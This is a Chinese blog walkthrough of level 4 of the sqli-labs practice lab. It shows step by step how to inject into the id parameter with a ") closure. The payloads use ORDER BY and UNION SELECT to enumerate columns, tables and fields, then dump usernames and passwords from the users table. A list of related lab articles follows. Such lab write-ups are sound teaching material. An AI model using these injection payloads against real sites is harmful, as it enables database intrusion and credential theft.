sqli-labs---第四关

简介: sqli-labs---第四关

1、判断类型的注入

?id=1(正常回显)

?id=1'(正常回显)

?id=1"(报错)

可判断为字符型闭合,")为闭合方式

2、查询列数,判断回显位置

?id=1") order by 3 --+

?id=1") order by 4 --+

判断出有3列

?id=1") and 1=2 union select 1,2,3 --+

2,3位置有回显

3、查询数据库名(库名为security)

?id=1") and 1=2 union select 1,database(),3 --+

4、查询表名(有4张表,我们查询users这张表)


?id=1") and 1=2 union select 1,database(),group_concat(table_name) from information_schema.tables where table_schema=database(); --+  

5、查询users表中字段


?id=1") and 1=2 union select 1,database(),group_concat(column_name) from information_schema.columns where table_name='users'; --+  

6、查询用户名和密码字段的值 ,用id分隔开方便观看

?id=1") and 1=2 union select 1,database(),group_concat(username,id,password) from security.users --+

相关文章
|
7天前
|
数据安全/隐私保护
【less-4】sqli-labs靶场第四关
【less-4】sqli-labs靶场第四关
7 1
|
1月前
|
安全 数据库
sqli-labs---第五关
sqli-labs---第五关
|
7天前
|
SQL 安全 关系型数据库
【less-2】sqli-labs靶场第二关
【less-2】sqli-labs靶场第二关
16 0
|
1月前
|
安全 数据库 数据安全/隐私保护
sqli-labs---第三关
sqli-labs---第三关
|
1月前
|
安全 数据库
sqli-labs---第二关
sqli-labs---第二关
|
1月前
|
PHP
8、sqli-labs环境
8、sqli-labs环境
18 1
|
SQL 数据库
SQLi LABS Less-26a
第26a关使用GET请求传递参数,在url地址栏中构造payload即可 源码中过滤了参数中的or,and,/*,--,#,空格,斜线,我们想办法绕过即可
282 0
SQLi LABS Less-26a
|
SQL 安全 数据库
SQLi 38关
第三十八关请求方式为GET请求 , 注入类型为 单引号字符串型注入 第一步,测试注入方式
125 0
SQLi 38关
|
SQL 数据库 数据安全/隐私保护
SQLi LABS Less-16
第16关使用POST请求提交参数,可以使用代理工具抓包或直接在输入框中修改参数 后端代码根据用户输入账号和密码去数据库中查询,查询成功则返回登录成功,否则返回登录失败,页面没有显示的数据,SQL语句中使用了错误抑制符@来限制数据库的报错信息,因此不能使用联合注入或报错注入,推荐使用布尔盲注,源码如下
123 0
SQLi LABS Less-16
|
SQL 数据库
SQLi LABS Less-27a
第27关使用GET请求提交参数,在url地址栏中构造payload即可 后端源码中过滤了/*,--,#,空格,select,union,需要考虑一下怎么绕过这些规则
151 0
SQLi LABS Less-27a